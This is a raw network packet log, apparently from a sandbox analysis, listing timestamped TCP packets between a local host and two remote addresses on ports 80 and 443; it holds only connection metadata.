Oct 24, 2024 21:22:37.783622026 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.783662081 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.783694983 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.783698082 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.783716917 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.783762932 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.899575949 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.899682045 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.899722099 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.899755955 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900157928 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900157928 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900166988 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900218010 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900228977 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900254965 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900271893 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900294065 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900324106 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900331974 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900369883 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900371075 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900578022 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900615931 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900650978 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900651932 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900650978 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900685072 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.900746107 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.900746107 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.901304960 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.901355982 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.901365995 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.901395082 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:37.901416063 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:37.901449919 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017092943 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017206907 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017277956 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017323971 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017359972 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017370939 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017370939 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017395973 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017401934 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017431974 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017443895 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017483950 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017685890 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017719030 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017734051 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017754078 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017764091 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017788887 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017802000 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017823935 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.017838955 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.017874002 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.018603086 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.018663883 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.018677950 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.018716097 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.018732071 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.018749952 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.018780947 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.018781900 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.018786907 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.018836021 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135365009 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135440111 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135474920 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135509014 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135529041 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135529041 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135543108 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135576963 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135597944 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135598898 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135610104 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135631084 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135631084 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135651112 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135690928 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135696888 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135710001 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135925055 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135925055 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.135935068 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.135993004 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.136008024 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.136070967 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.176496029 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.176541090 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.176578045 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.176615000 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.176712036 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.176712990 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.176712990 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.176712990 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.252340078 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252446890 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252485037 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252520084 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252557039 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252592087 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252628088 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.252707005 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.252707005 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.252795935 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.467161894 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.467412949 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:38.911079884 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:38.911341906 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:39.771220922 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:39.771395922 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:40.946547031 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:40.946635008 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:40.946733952 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:40.977143049 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:40.977225065 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:41.118395090 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:41.119352102 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:42.098572969 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.098875046 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.103204012 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.103255987 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.103739977 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.104057074 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.160228014 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.207432032 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.542829990 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.542943954 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.543008089 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.544851065 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.545547962 CEST	49165	443	192.168.2.22	5.159.62.243
Oct 24, 2024 21:22:42.545610905 CEST	443	49165	5.159.62.243	192.168.2.22
Oct 24, 2024 21:22:42.553608894 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:42.559386969 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:42.559472084 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:42.559612989 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:42.565162897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229069948 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229163885 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229202986 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229238033 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229260921 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229260921 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229274035 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229309082 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229330063 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229331017 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229345083 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229356050 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229381084 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229415894 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229449034 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229449034 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229453087 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.229487896 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.229507923 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.235363007 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.235423088 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.235461950 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.235630989 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.235631943 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.258548975 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.347832918 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.347886086 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.347899914 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.347928047 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.347959042 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.347994089 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348006010 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348030090 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348037958 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348064899 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348074913 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348100901 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348109007 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348138094 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348145008 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348181963 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348686934 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348743916 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348747015 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348782063 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348789930 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348819971 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.348824024 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.348866940 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.465898991 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.465961933 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466018915 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466053963 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466089010 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466099024 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466099977 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466099977 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466099977 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466123104 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466135979 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466161013 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466327906 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466362953 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466363907 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466365099 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466396093 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466398954 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466407061 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466435909 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.466448069 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.466483116 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.467189074 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.467237949 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.467241049 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.467279911 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.467284918 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.467334032 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.467345953 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.467390060 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.468096018 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.468157053 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.470520020 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584005117 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584050894 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584089041 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584124088 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584158897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584194899 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584198952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584198952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584198952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584198952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584198952 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584232092 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.584238052 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584294081 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.584965944 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585037947 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585077047 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585129976 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585158110 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585158110 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585158110 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585184097 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585191011 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585218906 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585235119 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585256100 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585266113 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585290909 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585304022 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585313082 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.585344076 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.585354090 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.930799961 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.930874109 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.930881023 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.930924892 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.930932999 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.930969954 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.930982113 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931015968 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931022882 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931072950 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931077003 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931113005 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931124926 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931158066 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931164980 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931199074 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931216002 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931236029 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931248903 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931284904 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931288004 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931340933 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931349039 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931401014 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931401014 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931435108 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931447029 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931483984 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931487083 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931523085 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931539059 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931552887 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931571007 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931581974 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931602955 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931617022 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931621075 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931653023 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931664944 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931674957 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931684017 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931689024 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931719065 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931729078 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931752920 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931766033 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931783915 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931798935 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931816101 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931829929 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931849957 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931870937 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931893110 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931905031 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931929111 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.931941032 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.931988001 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932017088 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932028055 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932051897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932069063 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932080984 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932095051 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932112932 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932128906 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932147980 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932159901 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932182074 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932194948 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932216883 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932229042 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932250977 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932265997 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932286024 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932296991 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932318926 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:43.932321072 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:43.932338953 CEST	49166	80	192.168.2.22	192.3.176.141
